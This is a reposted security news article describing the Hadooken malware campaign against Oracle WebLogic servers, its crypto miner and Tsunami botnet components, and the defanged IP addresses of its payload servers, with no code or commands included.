No Comments

Linux malware campaign targets Oracle WebLogic in a bid to mine cryptocurrency

 

Cybersecurity researchers have identified a new malware campaign targeting Linux systems to carry out unauthorized cryptocurrency mining and deliver botnet malware.

The campaign, which specifically targets Oracle WebLogic servers, delivers a malware strain known as Hadooken, according to cloud security firm Aqua.

“When Hadooken is executed, it drops Tsunami malware and initiates a crypto miner,” explained security researcher Assaf Moran.

The attack exploits known vulnerabilities and misconfigurations, such as weak credentials, to gain an initial foothold and execute arbitrary code on vulnerable instances.

Two nearly identical payloads—one in Python and the other as a shell script—are used to retrieve the Hadooken malware from remote servers (“89.185.85[.]102” or “185.174.136[.]204“).

Additionally, the shell script variant scans various directories containing SSH data (like user credentials, host details, and secrets) to attack known servers, Morag added.

“It then moves laterally across the organization or connected systems, further propagating the Hadooken malware.”

New Linux Malware

Key components

Hadooken contains two key components:

  • a cryptocurrency miner
  • and a distributed denial-of-service (DDoS) botnet known as Tsunami (also referred to as Kaiten), which has previously targeted Jenkins and WebLogic services running in Kubernetes clusters.

The malware also establishes persistence on the host by setting up cron jobs to periodically trigger the crypto miner at different intervals.

According to Aqua, the IP address 89.185.85[.]102, registered in Germany under the hosting provider Aeza International LTD (AS210644), has been linked to an 8220 Gang cryptocurrency campaign, previously reported by Uptycs in February 2024. This campaign exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.

The second IP address, 185.174.136[.]204, while currently inactive, is also connected to Aeza Group Ltd. (AS216246). Reports from Qurium and EU DisinfoLab in July 2024 revealed that Aeza is a bulletproof hosting service with operations in Moscow M9 and two data centers in Frankfurt.

“Aeza’s rapid growth can be attributed to

  • its recruitment of young developers
  • associated with Russian bulletproof hosting providers, offering a safe haven for cybercrime activities,” the researchers concluded.

 


Source: TheHackerNews

Read other news at our blog

You might also like

More Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.